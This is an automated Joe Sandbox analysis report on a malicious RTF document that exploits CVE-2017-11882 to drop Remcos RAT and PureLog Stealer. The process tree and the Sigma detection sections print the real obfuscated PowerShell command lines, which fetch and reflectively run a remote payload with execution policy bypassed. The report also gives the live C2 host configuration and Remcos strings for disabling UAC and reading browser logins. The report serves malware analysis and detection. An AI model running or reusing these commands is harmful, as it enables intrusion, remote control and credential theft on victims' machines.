Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
Analysis ID:1519296
MD5:9cb9142659aa46876659d869b522a616
SHA1:7704e37a8ec272ec3a8f24c2f56e8e0c0071a7fe
SHA256:d9c48d17fccf4c215621206bf43697a8e56120e21a6fe8669ec36a5be8e05a43
Tags:rtf
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3268 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3352 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3520 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 4064 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "authurremc.duckdns.org:14645:1", "Assigned name": "authur", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7B1J99", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1692:$obj2: \objdata
  • 0x16ac:$obj3: \objupdate
  • 0x166d:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.powershell.exe.3cf0b60.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              8.2.powershell.exe.3cf0b60.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                8.2.powershell.exe.3cf0b60.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  8.2.powershell.exe.3cf0b60.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x690b8:$a1: Remcos restarted by watchdog!
                  • 0x69630:$a3: %02i:%02i:%02i:%03i
                  8.2.powershell.exe.3cf0b60.1.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6317c:$str_b2: Executing file:
                  • 0x641fc:$str_b3: GetDirectListeningPort
                  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x63d28:$str_b7: \update.vbs
                  • 0x631a4:$str_b9: Downloaded file:
                  • 0x63190:$str_b10: Downloading file:
                  • 0x63234:$str_b12: Failed to upload file:
                  • 0x641c4:$str_b13: StartForward
                  • 0x641e4:$str_b14: StopForward
                  • 0x63c80:$str_b15: fso.DeleteFile "
                  • 0x63c14:$str_b16: On Error Resume Next
                  • 0x63cb0:$str_b17: fso.DeleteFolder "
                  • 0x63224:$str_b18: Uploaded file:
                  • 0x631e4:$str_b19: Unable to delete:
                  • 0x63c48:$str_b20: while fso.FileExists("
                  • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 22 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.29.10.52, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3352, TargetFilename: C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJl
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3352, Protocol: tcp, SourceIp: 185.29.10.52, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250Z
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' 